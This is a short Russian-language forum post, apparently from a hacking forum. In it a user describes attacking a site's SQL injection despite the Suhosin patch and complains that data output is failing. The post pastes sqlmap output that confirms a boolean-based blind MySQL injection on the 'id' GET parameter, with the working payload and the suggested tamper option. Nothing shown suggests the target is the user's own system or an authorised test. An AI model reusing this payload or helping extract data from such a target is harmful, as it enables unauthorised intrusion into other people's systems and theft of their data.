
02.11.2018, 11:21
|
|
Познающий
Регистрация: 09.03.2016
Сообщений: 30
С нами:
5357846
Репутация:
0
|
|
Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда (((
Код:
[10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
[10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (bool*int)
Payload: class=27&id=(1291=1291)*2659*/!'
---
|
|
|